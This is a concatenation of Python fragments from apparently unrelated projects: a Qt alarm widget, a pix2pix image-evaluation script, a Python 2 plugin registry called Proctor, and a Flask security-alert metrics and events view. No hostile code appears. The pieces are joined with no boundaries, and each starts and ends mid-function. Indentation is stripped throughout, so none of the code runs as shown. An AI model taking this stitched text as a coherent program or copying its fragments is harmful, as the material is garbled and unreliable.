if self._central_widget.alarm_activated != self._alarmed or self._value_format_changed:
self._alarmed = self._central_widget.alarm_activated
# select format based on alarm state
if self._central_widget.alarm_activated:
self._value_display.setStyleSheet("QLabel { background-color : " + ICDisplayConfig.QtColorToSting(self._error_back_color) +
"; color : " + ICDisplayConfig.QtColorToSting(self._error_text_color) + "; border-radius : 5px; }")
else:
self._value_display.setStyleSheet("QLabel { background-color : " + ICDisplayConfig.QtColorToSting(self.background_color) +
"; color : " + ICDisplayConfig.QtColorToSting(self._value_color) + "; border-radius : 5px; }")
# update the value text
if self._unit:
self._value_display.setText("<span style='font-size:" + "{}".format(self._value_size) + "pt;'>" + "{:.2f}".format(self._value) +
"</span> <span style='font-size:" + "{}".format(self._unit_size) + "pt;'>" + self._unit + "</span>")
else:
self._value_display.setText("<span style='font-size:" + "{}".format(self._value_size) + "pt;'>" + "{:.2f}".format(self._value) + "</span>")
# update the label
self._value_display.update()
# update the widget
def _local_update(self):
# update the title text
self._title_update()
# update the value text
self._value_update()
# update self
self.update()
########################################################
# base class event overrides
########################################################
# change in the orientation of the container
def on_position_changed(self) -> None:
if self.__container_type in (ICLinearContainerType.BAR, ICLinearContainerType.BAR_NO_TITLE, ICLinearContainerType.BAR_NO_VALUE,
ICLinearContainerType.BAR_NO_TITLE_NO_VALUE):
# update the widget position
self.widget_position = self.position
# update the scale_position
self.scale_position = ICWidgetPosition.opposite(self.position)
# change the visibility of elements
def on_state_changed(self) -> None:
if self.state == ICWidgetState.Hidden:
# hide the central widget
self._central_widget.state = ICWidgetState.Hidden
self._central_widget.update()
# hide the first scale bar
if self.scale_bar_one is not None:
self.scale_bar_one.state = ICWidgetState.Hidden
self.scale_bar_one.update()
# hide the second scale bar
if self.scale_bar_two is not None:
self.scale_bar_two.state = ICWidgetState.Hidden
self.scale_bar_two.update()
# hide the title label
if self._title_display is not None:
self._title_display.hide()
self._title_display.setMaximumSize(0, 0)
# hide the value label
# image, calculate inception score, and store in a list
#Then make some plots based on dimensionality and result
#First, remove the directory in checkpoints if it exists
#Then, copy desired model to the checkpoints as "latest_blahblah.pth"
#Then run the script and see the output in results
imgDictVal = {}
imgDictTest = {}
usrInRerun = input('Do you want rerun test/val image output [1 for yes]: ')
usrInDir = input('Do you want to delete the old directories if they pop up and replace them with the new images? [1 for yes]: ')
skipUserIn = input('Do you want to loop? [1 for loop, any other to skip to heuristic/loss]: ')
if int(skipUserIn) == 1:
for runPathIter in runDirList:
#destroy/create new directory
path = checkPath + runPathIter
command = ['rm', '-r', path]
subprocess.run(command)
#again, returns 1 if unsuccessful and 0 if ok
command = ['mkdir', path]
subprocess.run(command)
#copy over the desired model as latest
try:
srcPath = subSeedPath + '/' + runPathIter + '/checkpoints/' + modelStr
sinkPath = checkPath + runPathIter + '/latest_net_G.pth'
print('Copying over from ' + runPathIter)
shutil.copy2(srcPath,sinkPath)
except:
print('ALERT, ALERT, RUN ' + runPathIter + ' DIDNT HAVE NEEDED MODEL')
continue
#Now, run the both the test and validation sets
#For now, do 200 of each (remember, validation has like 700 and is different, test is from training)
# if int(usrInRerun) == 1 and runPathIter == 'run_0':
if int(usrInRerun) == 1:
command = ['rm', '-r', 'results/' + runPathIter]
print('Running validation phase for ' + runPathIter + '...')
subprocess.run(command)
command = ['python', 'test.py', '--dataroot', pathToData, '--name', runPathIter, \
'--model', 'pix2pix', '--direction', 'AtoB', '--gpu_ids',
'-1', '--num_test='+str(valNum), '--phase','val']
subprocess.run(command)
print('Running testing phase for ' + runPathIter + '...')
command = ['python', 'test.py', '--dataroot', pathToData, '--name', runPathIter, \
'--model', 'pix2pix', '--direction', 'AtoB', '--gpu_ids',
'-1', '--num_test='+str(testNum), '--phase','test']
subprocess.run(command)
#Now copy and parse over the files; copy their contents into lists to process
testrunPath = subSeedPath + '/' + runPathIter + '/saved_results/model_' + str(chosenModel)
command = ['mkdir', subSeedPath + '/' + runPathIter + '/saved_results']
temp = subprocess.run(command)
command = ['mkdir', testrunPath]
temp = subprocess.run(command)
if temp.returncode == 0:
print('Created directory at ' + testrunPath)
elif temp.returncode == 1:
if int(usrInDir) == 1:
command = ['rm', '-r', testrunPath]
subprocess.run(command)
command = ['mkdir', testrunPath]
subprocess.run(command)
else:
print('Using old directory (not rewriting images)...')
if temp.returncode == 0 or (temp.returncode == 1 and int(usrInDir) == 1):
#First remove the .DS_Store file so we don't pick up any stray entries
srcPath = 'results/' + runPathIter + '/test_latest/images/'
sinkPath = testrunPath + '/test'
# command = ['rm', srcPath + '.DS_Store']
# subprocess.run(command)
shutil.copytree(srcPath,sinkPath)
print('Test directory copied!')
srcPath = 'results/' + runPathIter + '/val_latest/images/'
sinkPath = testrunPath + '/val'
# command = ['rm', srcPath + '.DS_Store']
# subprocess.run(command)
shutil.copytree(srcPath,sinkPath)
print('Val directory copied!')
#Now run extraction script to read individual files and store inside lists
#Structure is as follows:
#imgDict is a dictionary containing a list
#list is [sketch img, black and white image, generated image]
#each listentry is a list of the names of the images
#Thus, for a given run, we can query the dictionary, and iterate through one of the lists
path = testrunPath + '/val'
dirList = os.listdir(path)
dirList.sort()
try:
dirList.remove('.DS_Store')
except:
print('os_dir wasnt in the dir')
#When sorted, order is: xxx_fake_B.png, xxx_real_A.png, xxx_real_B.png, etc
skL = []
bwL = []
genL = []
for i in range(len(dirList)//3):
skL.append(dirList[i*3+1])
bwL.append(dirList[i*3+2])
genL.append(dirList[i*3])
imgDictVal[runPathIter] = [skL,bwL,genL]
path = testrunPath + '/test'
dirList = os.listdir(path)
dirList.sort()
try:
dirList.remove('.DS_Store')
except:
print('os_dir wasnt in the dir')
#When sorted, order is: xxx_fake_B.png, xxx_real_A.png, xxx_real_B.png, etc
skL = []
bwL = []
genL = []
for i in range(len(dirList)//3):
skL.append(dirList[i*3+1])
bwL.append(dirList[i*3+2])
genL.append(dirList[i*3])
imgDictTest[runPathIter] = [skL,bwL,genL]
##FINISHED WITH RUN DIRECTORY LOOP!##
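# Added sketch: grouping the pix2pix outputs by their numeric prefix is more
# robust than relying on sort order; assumes filenames like '007_fake_B.png'.
from collections import defaultdict
def groupImagesByPrefix(names):
    groups = defaultdict(dict)
    for name in names:
        prefix, _, kind = name.partition('_')  # e.g. '007', '_', 'fake_B.png'
        groups[prefix][kind.rsplit('.', 1)[0]] = name
    return groups  # groups['007'] -> {'fake_B': ..., 'real_A': ..., 'real_B': ...}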
####NOW, CALCULATE IS SCORES!!###
##COME BACK TO THIS, DONT KNOW HOW TO DO INCEPTION SCORE!!!!
#ISDictVal = {} #creating a dictionary for the inception scores
#ISDictTest = {}
#for runD in runDirList:
# valPath = testrunPath + '/val/'
#
# currList = imgDictVal[runD]
# skPath = currList[0]
# bwPath = currList[1]
# genPath = currList[2]
#
# for i in range(len(skPath)):
# skIm = cv2.imread(valPath + skPath, 0)
# bwIm = cv2.imread(valPath + bwPath, 0)
# genIm = cv2.imread(valPath + genPath, 0)
##NOW IMPLEMENT IMAGE CONCTENATION##
#Make sure to replace BOTH preStr variables and the imgDict for the tiling function!
#dispImList = [7,69,100,138,77,1,89,193]
dispImList = [7,69,99,77,1,89]
ifRun = input('Do you want to run tile images? [1 for yes]: ')
if int(ifRun) == 1:
ifSave = input('Do you want to save the tile images? [1 for yes]: ')
saveIn = False
if int(ifSave) == 1:
saveIn = True
for dispIm in dispImList:
tileCompFunc(imgDictVal, runDirList, dispIm, subSeedPath, preStr='val', save=saveIn)
for dispIm in dispImList:
tileCompFunc(imgDictTest, runDirList, dispIm, subSeedPath, preStr='test', save=saveIn)
##IMPLEMENT CUSTOM HEURISTIC FUNCTION BELOW##
#Test on run0
print('Calculating heuristic index, val...')
inTxt = input('Do you want to calc heuristic index? [1 for yes]: ')
if int(inTxt) == 1:
plt.figure(0)
for runID in runDirList:
heurArr = []
try:
for i in range(len(imgDictVal[runID][0])):
heurArr.append(calcHeuristic(imgDictVal, runID, i, subSeedPath, preStr='val'))
plt.plot(heurArr)
print('Mean for ' + runID + ' = ' + str(np.mean(heurArr)))
except:
print('ALERT ALERT COULDNT RETRIEVE INFO FROM ' + runID)
continue
print('Calculating heuristic index, TEST...')
plt.figure(1)
for runID in runDirList:
heurArr = []
for i in range(len(imgDictTest[runID][0])):
heurArr.append(calcHeuristic(imgDictTest, runID, i, subSeedPath, preStr='test'))
plt.plot(heurArr)
print('Mean for ' + runID + ' = ' + str(np.mean(heurArr)))
##IMPLEMENT LOSS PLOTTING##
inTxt = input('Do you want to plot losses? [1 for yes]: ')
if int(inTxt) == 1:
print('Plotting losses...')
runUserIn = input('Which run to plot for? ')
if runUserIn == 'all':
for runPathIter in runDirList:
try:
runPath = subSeedPath + '/' + runPathIter + '/loss'
G_GAN, G_loss, D_real, D_fake, combEpoch = lossDataLoad(runPath)
plotName = runPathIter + '-'
lossPlotFunc(G_GAN, G_loss, D_real, D_fake, combEpoch, lossPath + '/', plotName)
except:
print(runPathIter + ' didnt have loss log')
else:
runPath = subSeedPath + '/run_' + runUserIn + '/loss'
G_GAN, G_loss, D_real, D_fake, combEpoch = lossDataLoad(runPath)
plotName = 'run_' + runUserIn + '-'
lossPlotFunc(G_GAN, G_loss, D_real, D_fake, combEpoch, lossPath + '/', plotName)
##IMPLEMENT SIDE-BY-SIDE PLOTTING##
inTxt = input('Do you want tile image transform flow? [1 for yes]: ')
if int(inTxt) == 1:
print('Tiling images...')
runUserIn = input('Which run to plot for? ')
##INPUT HERE
maxModel = 92
modelSpacing = 4
tileNum = 1500
val = True
imgVal = 10
##INPUT HERE
#create model list with strings (so I dont have to do it later with paths)
temp = list(np.arange(modelSpacing,maxModel + modelSpacing, modelSpacing))
modelList = [str(i) for i in temp]
#Define other variables we'll need for these operations
if val:
testPhase = 'val'
testPhasePath = '/val_latest'
loggedDict = imgDictVal
else:
testPhase = 'test'
testPhasePath = '/test_latest'
loggedDict = imgDictTest
imgGenUser = input('Run the tiling image generation again? [1 to run again]: ')
if int(imgGenUser) == 1:
#First make the directory that we'll be running the tiling in
savingPath = subSeedPath + '/run_' + runUserIn + '/saved_results/time_tiling'
command = ['mkdir', savingPath]
subprocess.run(command)
for currModel in modelList:
print('Running model ' + currModel + '...')
currModelPath = savingPath + '/run_'+ runUserIn + '_model_' + currModel
currModelCheckpoint = 'time_tiling-run_' + runUserIn + '_model_' + currModel
#destroy/create new directory
path = checkPath + currModelCheckpoint
command = ['rm', '-r', path]
subprocess.run(command)
#again, returns 1 if unsuccessful and 0 if ok
command = ['mkdir', path]
subprocess.run(command)
#copy over the desired model as latest
srcPath = subSeedPath + '/run_' + runUserIn + '/checkpoints/' + currModel + '_net_G.pth'
sinkPath = 'checkpoints/' + currModelCheckpoint + '/latest_net_G.pth'
print('Copying over from run_' + runUserIn)
shutil.copy2(srcPath,sinkPath)
command = ['rm', '-r', 'results/' + currModelCheckpoint]
subprocess.run(command)
"""
Proctor (Audit) System.
A stand-alone library that provides a pluggable framework to simplify
coding functions that detect/fix data conditions. The objective
is to abstract the boilerplate code necessary to expose such functions
to the front-end and re-use them throughout the application.
Sometimes when we find an issue, we write a function that will
tell us the extent of the issue. And we keep running that function
over time until that condition goes away. That function serves as a 'detector'
for us to see if we are solving the issue.
The Proctor system attempts to put some structure around that workflow,
to allow us to specify functions that can be added/removed without impact
to the core code base.
At some point we could slap a GUI on the Proctor to code a condition on
the fly so that we can add custom reporting without a deployment.
"""
import sys
import copy
import hashlib
import logging
import warnings
from mapping import Mapping
from .registry import ConditionRegistry
from .exceptions import NotRegistered, BadProctorCondition
import plugin_support as plugins
log = logging.getLogger("proctor")
ilog = logging.getLogger('proctor.meta')
clog = logging.getLogger('proctor.condition')
def warnFormatter(message, category, filename, lineno, line=None):
return "{}: {}".format(category.__name__, message)
warnings.formatwarning = warnFormatter
def get_property(obj, key):
"""Get the value of a related property - however deep"""
_keys = key.split(".")
# dotted keys "x.y.z"
if len(_keys) > 1:
# Could raise AttributeError
return get_property(getattr(obj, _keys[0]), ".".join(_keys[1:]))
else:
return getattr(obj, _keys[0])
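# Example (added): get_property(order, "customer.address.zip") resolves
# order.customer.address.zip one attribute at a time, raising AttributeError
# if any link in the chain is missing (`order` is a hypothetical object).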
class ProctorSingleton(type):
"""
The first instance created will load the plugins, if
provided some paths. see Proctor.__init__
"""
_instances = {}
def __call__(self, *args, **kwargs):
if self not in self._instances:
inst = super(ProctorSingleton, self).__call__(*args, **kwargs)
self._instances[self] = inst
inst.load_plugins()
return self._instances[self]
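# Note (added): the metaclass caches the first instance per class, so
# Proctor() always returns the same object and load_plugins() runs exactly
# once, on first construction.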
class Proctor(object):
"""Manages conditions, detectors, and rectifiers collected as a registry"""
__metaclass__ = ProctorSingleton
def __init__(self, extpaths=None):
self._conditions = ConditionRegistry()
self.plugin_dirs = extpaths if extpaths else []
"""
Methods that deal with loading conditions, detectors, and
rectifiers.
"""
def load_plugins(self):
"""Load all the directories"""
for path in self.plugin_dirs:
self.load_plugins_from(path)
def load_plugins_from(self, dirname):
"""Loads plugins from a directory"""
try:
if plugins.load(dirname):
log.info(u"Successfully loaded plugins from {}".format(dirname))
except Exception as e:
log.exception(u"Failed to load extensions at {}. {}".format(dirname, e.message))
def add_module(self, name):
"""Load a module that contains conditions and detectors"""
log.debug(u"Adding module {}".format(name))
plugins.load_module(name)
def add_paths(self, paths):
"""Appends the plugin path after loading"""
for path in paths:
if path not in self.plugin_dirs:
self.load_plugins_from(path)
self.plugin_dirs.append(path)
@property
def condition_list(self):
"""Get a listing of condition names"""
return self._conditions.condition_list()
def register(self, cls):
"""Registers both Conditions and ProctorObjects"""
log.debug("Registering {}".format(cls.__name__))
logging.captureWarnings(True)
self._conditions.register(cls)
logging.captureWarnings(False)
def get_registry(self):
"""Returns the registry (a copy)"""
return self._conditions.get_registry()
def show_registry(self):
"""Shows the content of the registry"""
return self._conditions.show()
def __get_conditions(self, context):
"""
Get the conditions registered to the context,
where context is class object
"""
return self._conditions.get_registered_conditions(context)
def find_condition(self, condition, klass):
"""
Find a specific (registered) condition - will contain all associated detectors and rectifiers
condition(str or condition instance) text for look up for
klass(class) to find the conditions for
"""
name = condition if isinstance(condition, basestring) else condition.name
for _condition in self.__get_conditions(klass):
if _condition.name == name:
return _condition
return None
def conditions(self, obj, min_level=1, exposed=None):
"""
Get contextual condition objects - aka conditions that can be called to detect and
rectify on the given object
"""
conditions = []
for cond in self._conditions.get_registered_conditions(obj.__class__):
if cond.condition.level >= min_level:
if exposed is None:
conditions.append(ContextualCondition(obj, cond))
else:
if exposed == cond.condition.exposed:
conditions.append(ContextualCondition(obj, cond))
return conditions
def detect_conditions(self, obj, min_level=1, exposed=None):
"""Executes the detector on contextualConditions"""
for condition in self.conditions(obj, min_level, exposed):
condition.detect()
yield condition
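# Added usage sketch (`order` is a hypothetical domain object):
# p = Proctor()
# for cond in p.detect_conditions(order, min_level=1):
#     print(cond)  # each yielded ContextualCondition has already run detect()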
def get_rectifier(self, condition, obj):
"""Gets a condition rectifier for an obj"""
try:
return self.find_condition(condition, obj.__class__).get_rectifier(obj)
except Exception:
return None
def get_contextual_condition(self, condition, obj):
"""Get the contextualCondition for this object"""
try:
return ContextualCondition(obj, self.find_condition(condition, obj.__class__))
except Exception:
return None
def detect_condition(self, condition, obj):
_condition = self.get_contextual_condition(condition, obj)
if _condition:
_condition.detect()
return _condition
def clear_registry(self):
log.critical("Clearing condition registry")
self._conditions.reset()
self.plugin_dirs = []
class ProctorObjectMeta(type):
"""Handles the registration and checking ProctorObjects"""
def __init__(cls, name, bases, attrs):
"""
Called when a derived class is imported.
Classifies the ProctorObject as a detector, rectifier or condition.
"""
rectifier = False
detector = False
_cls = {}
ilog.debug("Building class {} {} {} {}".format(cls, name, bases, attrs))
# Check methods for a rectifier and a detector,
# as determined (see: decorators)
for _name, method in cls.__dict__.iteritems():
ilog.debug("Checking {} {}".format(_name, method))
# Has a decorated rectifier?
if hasattr(method, "is_rectifier"):
_cls["_is_rectifier"] = True
_cls["_rectify"] = method
rectifier = True
# Has a decorated detector?
if hasattr(method, "is_detector"):
_cls["_is_detector"] = True
_cls["_detector"] = method
detector = True
# Has a decorated filter method?
# If a method is specified as a filter,
# it takes precedence over 'applies_to'
# and 'excludes' properties.
if hasattr(method, "is_filter"):
ilog.debug("{} has prefilter".format(name))
_cls['_has_filter'] = True
_cls['_filter'] = method
# Make it the highest priority
_cls['_filter_priority'] = sys.maxint
# Inject the things we set above into the class
for k, v in _cls.items():
setattr(cls, k, v)
# If there is no filter in this class - make one that
# understands the 'applies_to' and 'excludes' class properties.
# NOTE: This purposely breaks inheritance of the _filter property.
if "_filter" not in cls.__dict__ and "_filter" not in _cls:
    # Declare the filter method that will honor 'applies_to' and 'excludes'.
def _filter(self, obj):
ilog.debug("Checking {}.filter()".format(cls.__name__))
for k, v in cls.applies_to.items():
# try to get the value for the key
try:
value = get_property(obj, k)
except Exception:
ilog.exception(u"Cannot get value for {}".format(k))
return False
ilog.debug("Value of {} {}".format(k, value))
if value not in v:
ilog.debug("{} {} not in {}".format(k, value, v))
return False
for k, v in cls.excludes.items():
# try to get the value for the key
try:
value = get_property(obj, k)
except Exception:
ilog.exception(u"Cannot get value for {}".format(k))
return True
ilog.debug("Value of {} {}".format(k, value))
if value in v:
ilog.debug("{} excluded {}".format(k, v))
return False
return True
"""
ProctorObject Priority:
It is possible that there exists more than one Detector/Rectifier
for a Condition-Context. Each Detector/Rectifier (ProctorObject) is
bound to a filter and the filter has a priority, therefore the ProctorObject
has that priority.
When trying to find the Detector function for a given Condition-Context pair, the
Proctor will check the Context against each filter in priority order. The first
filter that passes, identifies the Detector/Rectifier to use.
Priority calculation:
Priority is based on 'applies_to' and 'excludes' dictionaries. Remember those dictionaries
are of the form { 'prop1.prop2.prop3' : [val1, val2,..] }.
The formula is the sum of each item's weight, where the weight is:
    30 ** len(properties in key) + len(values)
Longer hierarchies are viewed as more specific, therefore weighted higher, and ties are
broken by the length of the values that apply to each key.
"""
# Compute the priority of the filter based on 'applies_to' and 'excludes'
priority = 0
try:
priority += sum(
map(lambda x: 30 ** (len(x.split('.'))) + len(cls.applies_to[x]), cls.applies_to.keys()))
priority += sum(
map(lambda x: 30 ** (len(x.split('.'))) + len(cls.excludes[x]), cls.excludes.keys()))
ilog.debug("{} priority {}".format(cls.__name__, priority))
cls._filter_priority = priority
cls._filter = _filter
except Exception:
warnings.warn("{} NOT REGISTERED: Cannot determine filter priority".format(name), NotRegistered)
return
# Not really used, the thought was if a rectifier and detector are in the
# same class, they should be presented together
if rectifier and detector:
cls._bonded = True
if rectifier or detector:
cls.pid = hashlib.sha1(cls.__name__).hexdigest()[:10].upper()
Proctor().register(cls)
else:
log.warn("{} NOT REGISTERED: no detector or rectifier function".format(name))
class ProctorObject(object):
"""Base Proctor Object"""
__metaclass__ = ProctorObjectMeta
context = None
applies_to = {}
excludes = {}
@classmethod
def context_name(cls):
return cls.context if isinstance(cls.context, basestring) else cls.context.__name__
@classmethod
def condition_name(cls):
if cls.condition:
return cls.condition if isinstance(cls.condition, basestring) else cls.condition.name
class ConditionMeta(type):
"""Handles the registration and checking of a condition"""
def __init__(cls, name, bases, attrs):
"""
Called when a derived class is imported.
Verifies that a condition has a name and a context
"""
log.debug("Registering Condition {}".format(name))
if hasattr(cls, 'name') and hasattr(cls, 'context'):
cls.pid = hashlib.sha1(cls.name).hexdigest()[:10].upper()
Proctor().register(cls)
else:
log.warn("Cannot register {}".format(cls.__name__))
class ContextualCondition(Mapping):
"""
Represents a condition checker that contains a context.
Will contain the detector and the rectifier for the object
being checked. Pretty much a RegisteredCondition Proxy
"""
def __init__(self, context, condition):
    # signature completed from the call sites above; the original body was
    # truncated in the source - minimally, store the pair being proxied
    self.context = context
    self.condition = condition
daterange = request.form['daterange']
metric_alert_stats = request.form.getlist('metric_alert_stats')
alert_metric_targets = request.form.getlist('alert_metric_targets')
events_metric_targets = request.form.getlist('events_metric_targets')
export_results_to = request.form.getlist('export_results')
selected_analysts = [int(uid) for uid in request.form.getlist('selected_analysts')]
selected_alert_types = request.form.getlist('selected_alert_types')
selected_companies = [int(cid) for cid in request.form.getlist('companies')]
for cid in selected_companies:
    selected_companies_map[cid] = target_companies[cid]
# independent alert tables
if 'alert_hours_of_operation' in request.form:
hours_of_operation = True
if 'alert_overall_cycle_time_summary' in request.form:
alert_overall_cycle_time_summary = True
# independent alert type tables
if 'alert_type_count_breakdown' in request.form:
alert_type_count_breakdown = True
# apply business hours before performing time calculations
if 'business_hours' in request.form:
business_hours = sla_business_hours
try:
daterange_start, daterange_end = daterange.split(' - ')
daterange_start = datetime.datetime.strptime(daterange_start, '%m-%d-%Y %H:%M:%S')
daterange_end = datetime.datetime.strptime(daterange_end, '%m-%d-%Y %H:%M:%S')
except Exception as error:
flash("error parsing date range, using default 7 days: {0}".format(str(error)))
daterange_end = datetime.datetime.now()
daterange_start = daterange_end - datetime.timedelta(days=7)
# store alerts for reuse
alerts = None
for alert_target in alert_metric_targets:
if alert_target == 'alerts':
with get_db_connection() as db:
alerts = get_alerts_between_dates(daterange_start,daterange_end, db, selected_companies=selected_companies)
if hours_of_operation:
hop_df = generate_hours_of_operation_summary_table(alerts.copy())
metric_results.append({'table': hop_df, 'plot': None})
tables.append(hop_df)
if alert_overall_cycle_time_summary:
sla_df = generate_overall_summary_table(alerts.copy())
metric_results.append({'table': sla_df, 'plot': None})
tables.append(sla_df)
alert_stat_map = statistics_by_month_by_dispo(alerts, business_hours=business_hours)
for stat in metric_alert_stats:
alert_stat_map[stat].name = FRIENDLY_STAT_NAME_MAP[stat]
tables.append(alert_stat_map[stat])
metric_results.append({'table': alert_stat_map[stat],
'plot': generate_html_plot(alert_stat_map[stat])})
if alert_target == 'alert_types':
with get_db_connection() as db:
# only use alert types that occur during the date range
alert_types = unique_alert_types_between_dates(daterange_start,daterange_end, db)
# XXX modify this function to accept a list of alert_types to generate stats for
alert_type_map = get_alerts_between_dates_by_type(daterange_start,daterange_end, db, selected_companies=selected_companies)
alert_type_stat_map = generate_alert_type_stats(alert_type_map, business_hours=business_hours)
if selected_alert_types:
# narrow to any alert_type selections
alert_types = [a_type for a_type in alert_types if a_type in selected_alert_types]
for alert_type in alert_types:
for stat in metric_alert_stats:
tables.append(alert_type_stat_map[alert_type][stat])
metric_results.append({'table': alert_type_stat_map[alert_type][stat],
'plot': None})
if alert_target == 'users':
if alerts is None:
with get_db_connection() as db:
alerts = get_alerts_between_dates(daterange_start,daterange_end, db, selected_companies=selected_companies)
selected_users = users
user_ids = users.keys()
if selected_analysts:
# narrow users to selected users
user_ids = [user_id for user_id in user_ids if user_id in selected_analysts]
# only generate what's needed
selected_users = {}
for user_id, user in users.items():
if user_id in user_ids:
selected_users[user_id] = user
all_user_stat_map = generate_user_alert_stats(alerts, selected_users, business_hours=business_hours)
for user_id in user_ids:
for stat in metric_alert_stats:
tables.append(all_user_stat_map[user_id][stat])
metric_results.append({'table': all_user_stat_map[user_id][stat],
'plot': generate_html_plot(all_user_stat_map[user_id][stat])})
for event_target in events_metric_targets:
# we will get the events no matter what
with get_db_connection() as db:
events = get_events_between_dates(daterange_start,daterange_end, db, selected_companies=selected_companies)
# by default, for gui, count emails
add_email_alert_counts_per_event(events, db)
if event_target == 'events':
tables.append(events.drop(columns=['id']))
metric_results.append({'table': events, 'plot': None})
if event_target == 'incidents':
incidents = get_incidents_from_events(events)
tables.append(incidents)
metric_results.append({'table': incidents, 'plot': None})
# Independent tables
if hours_of_operation:
if not business_hours:
# business hours required
business_hours = sla_business_hours
if alerts is None:
with get_db_connection() as db:
alerts = get_alerts_between_dates(daterange_start,daterange_end, db, selected_companies=selected_companies)
hop_df = generate_hours_of_operation_summary_table(alerts, business_hours)
tables.append(hop_df)
metric_results.append({'table': hop_df, 'plot': None})
if alert_overall_cycle_time_summary:
if not business_hours:
# business hours required
business_hours = sla_business_hours
if alerts is None:
with get_db_connection() as db:
alerts = get_alerts_between_dates(daterange_start,daterange_end, db, selected_companies=selected_companies)
overall_ct_summary = generate_overall_summary_table(alerts, business_hours)
tables.append(overall_ct_summary)
metric_results.append({'table': overall_ct_summary, 'plot': None})
if alert_type_count_breakdown:
with get_db_connection() as db:
# TODO: implement company selection here
at_counts = count_quantites_by_alert_type(daterange_start,daterange_end, db)
tables.append(at_counts)
metric_results.append({'table': at_counts, 'plot': None})
if tables and export_results_to:
time_stamp = str(datetime.datetime.now().timestamp())
time_stamp = time_stamp[:time_stamp.rfind('.')]
filename = f"ACE_metrics_{time_stamp}"
for export_type in export_results_to:
if export_type == 'xlsx':
filename += ".xlsx"
filebytes = dataframes_to_xlsx_bytes(tables)
output = make_response(filebytes)
output.headers["Content-Disposition"] = "attachment; filename="+filename
output.headers["Content-type"] = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"
return output
if export_type == 'json':
filename += ".tar.gz"
filebytes = dataframes_to_archive_bytes_of_json_files(tables)
output = make_response(filebytes)
output.headers["Content-Disposition"] = "attachment; filename="+filename
output.headers['Content-Type'] = 'application/x-gzip'
return output
return render_template(
'analysis/metrics.html',
metric_results=metric_results,
filter_state=filter_state,
valid_alert_stats=reversed(VALID_ALERT_STATS),
friendly_stat_name_map=FRIENDLY_STAT_NAME_MAP,
users=users,
valid_alert_types=valid_alert_types,
target_companies=target_companies,
selected_companies_map=selected_companies_map,
tables=tables,
post_bool=post_bool,
current_user=current_user,
full_access_users=full_access_users,
daterange=daterange)
@analysis.route('/events', methods=['GET', 'POST'])
@login_required
def events():
if not saq.CONFIG['gui'].getboolean('display_events'):
# redirect to index
return redirect(url_for('analysis.index'))
filters = {
'filter_event_open': SearchFilter('filter_event_open', FILTER_TYPE_CHECKBOX, True),
'event_daterange': SearchFilter('event_daterange', FILTER_TYPE_TEXT, ''),
'filter_event_type': SearchFilter('filter_event_type', FILTER_TYPE_SELECT, 'ANY'),
'filter_event_vector': SearchFilter('filter_event_vector', FILTER_TYPE_SELECT, 'ANY'),
'filter_event_prevention_tool': SearchFilter('filter_event_prevention_tool', FILTER_TYPE_SELECT, 'ANY'),
'filter_event_risk_level': SearchFilter('filter_event_risk_level', FILTER_TYPE_SELECT, 'ANY')
}
malware = db.session.query(Malware).order_by(Malware.name.asc()).all()
for mal in malware:
key = 'malz_{}'.format(mal.id)
filters[key] = SearchFilter(key, FILTER_TYPE_CHECKBOX, False)
companies = db.session.query(Company).order_by(Company.name.asc()).all()
for company in companies:
key = 'company_{}'.format(company.id)
filters[key] = SearchFilter(key, FILTER_TYPE_CHECKBOX, False)
campaigns = db.session.query(Campaign).order_by(Campaign.name.asc()).all()
for campaign in campaigns:
key = 'campaign_{}'.format(campaign.id)
filters[key] = SearchFilter(key, FILTER_TYPE_CHECKBOX, False)
reset_filter = ('reset-filters' in request.form) or ('reset-filters' in request.args)
if reset_filter:
for filter_item in filters.values():
filter_item.reset()
filter_state = {filters[f].name: filters[f].state for f in filters}
for filter_name in filters.keys():
form_value = filters[filter_name].form_value
if form_value is not None:
session[filter_name] = form_value
elif filter_name in session:
del session[filter_name]
query = db.session.query(Event)
if filters['filter_event_open'].value:
query = query.filter(Event.status == 'OPEN')
if filters['event_daterange'].value != '':
try:
daterange_start, daterange_end = filters['event_daterange'].value.split(' - ')
daterange_start = datetime.datetime.strptime(daterange_start, '%m-%d-%Y %H:%M')
daterange_end = datetime.datetime.strptime(daterange_end, '%m-%d-%Y %H:%M')
except Exception as error:
flash("error parsing date range, using default 7 days: {0}".format(str(error)))
daterange_end = datetime.datetime.now()
daterange_start = daterange_end - datetime.timedelta(days=7)
query = query.filter(and_(Event.creation_date >= daterange_start, Event.creation_date <= daterange_end))
if filters['filter_event_type'].value != 'ANY':
query = query.filter(Event.type == filters['filter_event_type'].value)
if filters['filter_event_vector'].value != 'ANY':
query = query.filter(Event.vector == filters['filter_event_vector'].value)
if filters['filter_event_prevention_tool'].value != 'ANY':
query = query.filter(Event.prevention_tool == filters['filter_event_prevention_tool'].value)
if filters['filter_event_risk_level'].value != 'ANY':
query = query.filter(Event.risk_level == filters['filter_event_risk_level'].value)
mal_filters = []
for filter_name in filters.keys():
if filter_name.startswith('malz_') and filters[filter_name].value:
mal_id = int(filter_name[len('malz_'):])
mal_filters.append(MalwareMapping.malware_id == mal_id)
if len(mal_filters) > 0:
query = query.filter(Event.malware.any(or_(*mal_filters)))
company_filters = []
for filter_name in filters.keys():
if filter_name.startswith('company_') and filters[filter_name].value:
company_id = int(filter_name[len('company_'):])
company_filters.append(CompanyMapping.company_id == company_id)
if len(company_filters) > 0:
query = query.filter(Event.companies.any(or_(*company_filters)))
campaign_filters = []
for filter_name in filters.keys():
if filter_name.startswith('campaign_') and filters[filter_name].value:
campaign_id = int(filter_name[len('campaign_'):])
campaign_filters.append(Event.campaign_id == campaign_id)
if len(campaign_filters) > 0:
query = query.filter(or_(*campaign_filters))
if 'event_sort_by' not in session:
session['event_sort_by'] = 'date'
session['event_sort_dir'] = True
sort_field = request.form.get('sort_field', None)
if sort_field is not None:
if session['event_sort_by'] == sort_field:
session['event_sort_dir'] = not session['event_sort_dir']
else:
session['event_sort_by'] = sort_field
session['event_sort_dir'] = True
if session['event_sort_by'] == 'date':
if session['event_sort_dir']:
query = query.order_by(Event.creation_date.desc())
else:
query = query.order_by(Event.creation_date.asc())
elif session['event_sort_by'] == 'event':
if session['event_sort_dir']:
query = query.order_by(Event.type.desc(), Event.vector.desc(), Event.name.desc())
else:
query = query.order_by(Event.type.asc(), Event.vector.asc(), Event.name.asc())
elif session['event_sort_by'] == 'campaign':
if session['event_sort_dir']:
query = query.order_by(Event.campaign.desc())
else:
query = query.order_by(Event.campaign.asc())
elif session['event_sort_by'] == 'prevention':
if session['event_sort_dir']:
query = query.order_by(Event.prevention_tool.desc())
else:
